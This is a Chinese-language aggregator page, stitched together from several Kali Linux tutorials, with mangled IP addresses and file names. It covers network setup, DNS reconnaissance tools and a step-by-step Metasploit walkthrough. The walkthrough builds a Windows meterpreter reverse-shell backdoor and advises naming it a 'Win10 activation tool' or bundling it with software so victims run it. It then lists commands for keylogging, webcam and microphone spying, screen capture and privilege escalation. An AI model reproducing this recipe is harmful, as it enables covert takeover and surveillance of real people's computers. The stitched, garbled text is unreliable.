首先把kali虚拟机的网络适配器更改为桥接模式直连物理网络。查看自己主机的(是自己真实电脑的不是虚拟机)ip地址,网关,网段
你的windows 键(键盘左下角那个微软图标) + r ,然后输入cmd ,调出shell ,输入ipconfig查看ip。修改/etc/network/interfaces 文件:gedit /etc/network/interfaces
“address”把ip地址设置为自己主机网段中的一个。修改dns
gedit /etc/resolvconf
添加几个常用DNS,重启网络服务
/etc/initd/networking restart(可能需要等一会)
WHOIS是一个标准的互联网协议,可用于搜集网络注册、注册域名、IP地址和自治系统的信息
例:whois baiducom
更多参数参考帮助文档:whois --help
向DNS服务器查询主机的ip地址,默认使用/etc/resolvconf里的DNS服务器;也可在指令尾部直接添加DNS服务器
默认情况下host指令会搜索域名的A记录、AAAA记录和MX记录,如需查询全部DNS记录,可使用选项-a
例:
host还可进行域传输,使用-l选项
进行DNS查询,仅返回该域的A记录,如需查询全部记录,可以将type设置为any
例:
该程序将收集的DNS信息分为:主机ip地址、该域的DNS服务器、该域的MX记录
例:dnsenum baiducom
功能很强大,除上之外:
它能通过谷歌搜索其他的域名和子域名
可使用字典对子域名进行爆破,kali里收录了dnsenum自带的字典文件(dnstxt),该字典可以测试1480个子域名;另外嗨哟一个dns-bigtxt字典,可以测试266930个子域名
可对C类网段进行whois查询并计算其网络范围
可对网段进行反向查询
采用多线程技术,可进行并发查询
参数解释-f dnstxt 指定字典文件,可以换成 dns-bigtxt 也可以自定义字典-dnsserver 8888 指定dns服务器,一般可以直接使用目标dns服务器,(PS:8888 是一个IP地址,是Google提供的免费dns服务器的IP地址,另一个是:8844)-o outputtxt 结果在 outputtxt文档里
例:dnsenum -f dnstxt baiducom
DNS枚举工具,可通过多项技术查找目标的ip地址和主机名,他会通过本机使用的DNS服务器查找使用个目标域的DNS服务器;也可以进行暴力破解子域名
特点是能针对不连续的ip空间和主机名称进行测试
该工具也是个神器,详细用法参考帮助
例:查找学校域名的有关信息
DMitry(Deepmagic Information Gathering Tool)是一个一体化的信息收集工具。它可以用来收集以下信息:
参数:
例:
网络路由信息可以帮助测试人员了解自己的主机到目标主机之间的网络通信路径,进而理解目标主机的网络情况,保护目标主机的防火墙信息,往往也暗藏在路由信息里
1、tcptraceroute
tcptraceroute是traceroute的补充,传统的traceroute程序在其发送的UDP或ICMP echo数据包中,设置有特定的TTL标志位。它把TTL值从1开始递增,直到数据包到达目标主机为止,而tcptraceroute则是使用tcp数据包进行测试,它利用TCP SYN(握手请求)数据包进行路由信息探测;
其有较高的通过率
常用选项
-i 指定接口,网络接口
-f 起初第几跳开始,比如5,开始显示第5跳的结果
-l traceroute包的长度
-q 查询的数字号
-t tos
-m 最大的TTL
-s 源地址,如果服务器有两块网卡,就可以采用指定-s的源地址路由,在所有的tracert/traceroute都 有这样的基本功能
-w等待的时间
示例1:通过traceroute和tcptraceroute进行对比:
可以直接看到结果的差别,也可以使用nslookup验证一下:
tcptraceroute最终到达了目的地,而traceroute 没有到达目的地。
2、tctrace
通过向目标主机发送TCP SYN数据包来获取相关信息
使用命令:tctrace -i<device> -d<targethost>
<device>指网卡接口,<targethost>指被测试的目标主机
例:tctrace -i eth0 -d >
前言
最近整理了一些 奇安信&华为&深信服大佬 的课件资料+大厂面试课题,想要的可以私信自取, 无偿赠送 给粉丝朋友~
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
演示环境
使用Kali 20213进行演示 *** 作
目标靶机: Win10专业版
软件:msfvenom、msfconsole(Kali系统内置)
1进入管理员模式
命令: sudo su
解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令
命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip> LPORT=本地端口号> –f exe –o 文件名>exe
解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址
本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就性
文件名可以随便写自己喜欢的名字,比如写Win10激活工具,可能更容易让目标主机上钩
当然MSF也可以用来渗透手机、mac、Linux等
接下来运行命令生成文件
默认生成的文件在根目录下
把刚才生成的文件放到目标靶机Win10系统中
命令: msfconsole
(1)命令: use exploit/multi/handler(选择模块)
(2)命令: set payload windows/meterpreter/reverse_tcp(选择攻击模块)
(3)命令: set LhOST 192168321(填写自己主机的IP地址)
(4)命令: set lport 1111(填写刚才生成文件时的端口号)
(5)命令: show options(查看设置参数)
(6)命令: exploit -z -j(后台执行)
我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面
(1)命令: sessions (查看上钩的用户)
(2)命令: sessions -i 1 (选择需要攻击的用户,这里选择第 1 个
命令: run vnc -i
cmd指令:
cat 读取文件内容到屏幕
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
del 删除指定文件
dir 列出文件(ls 的别名)
下载 下载文件或目录
编辑 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列出文件
mkdir 创建目录
mv 将源移动到目标
pwd 打印工作目录
rm 删除指定文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录
pkill 按名称终止进程
keyscan_start 开始捕获击键(开始键盘记录)
keyscan_dump 转储按键缓冲(下载键盘记录)
keyscan_stop 停止捕获击键(停止键盘记录)
record_mic X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat 开始视频聊天(视频,对方会有d窗)
webcam_list 单摄像头(查看摄像头列表)
webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)
enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)
getdesktop 得到当前的Meterpreter桌面
reboot 重新启动远程计算机
shutdown 关闭远程计算机
shell 放入系统命令 shell
enumdesktops 列出所有可访问的桌面和窗口站
getdesktop 获取当前的meterpreter桌面
idletime 返回远程用户空闲的秒数
keyboard_send 发送击键
keyevent 发送按键事件
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare 实时观看远程用户桌面
screenshot 抓取交互式桌面的屏幕截图
setdesktop 更改 Meterpreters 当前桌面
uictl 控制一些用户界面组件
record_mic 从默认麦克风录制音频 X 秒
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_stream 播放来自指定网络摄像头的视频流
play 在目标系统上播放波形音频文件 (wav)
getsystem 尝试将您的权限提升到本地系统的权限
execute -f notepad 打开记事本
————————————————
原文链接:> kali linux虚拟机dhcp服务启动不了的解决方法如下: 运行的是Kali Linux, 希望用桥接模式通过路由器获取动态IP, 但是无论如何也不能正确获取IP地址 一点点排查 1 排查DNS root@kali:~# cat /etc/resolvconf nameserver 19216811nameserver 114114114114 19216811在里面, DNS设置没有问题 2 排查网卡 网卡自动激活, 并配置dhcp获取IP方式 3排查VMWare 桥接设置
假设目标的80端口和443端口可以连接外网,本例中我们使用1111作为攻击者这边的外网IP。 PS:目标机器是Windows XP SP3,安装Internet Explorer 8。 0x02 攻击端的转发设置 为了接收目标机器的连接,我们(攻击端)必须设置路由器/防火墙的NAT,不同路由器/防火墙的配置方法不同,就不详细描述。总之,需要外网的IP的80端口和443端口可以转发到内网的IP(这里是1921680187)。 首先我们要确认一下配置是否成功。 在Kali中,创建一个html文件root@krypto1:/# cd /tmp
root@krypto1:/tmp# echo "It works" > testhtml
确定80端口和443端口未被占用。root@krypto1:/tmp# netstat -vantu | grep :80
root@krypto1:/tmp# netstat -vantu | grep :443
如果80端口被占用,使用lsof命令查看占用80端口的进程。root@krypto1:/tmp# lsof -i | grep :>
以上就是关于kali怎么连接网络全部的内容,包括:kali怎么连接网络、Kali Linux下信息搜集工具(命令)使用总结、Kali利用msf渗透Windows电脑(超详细)等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)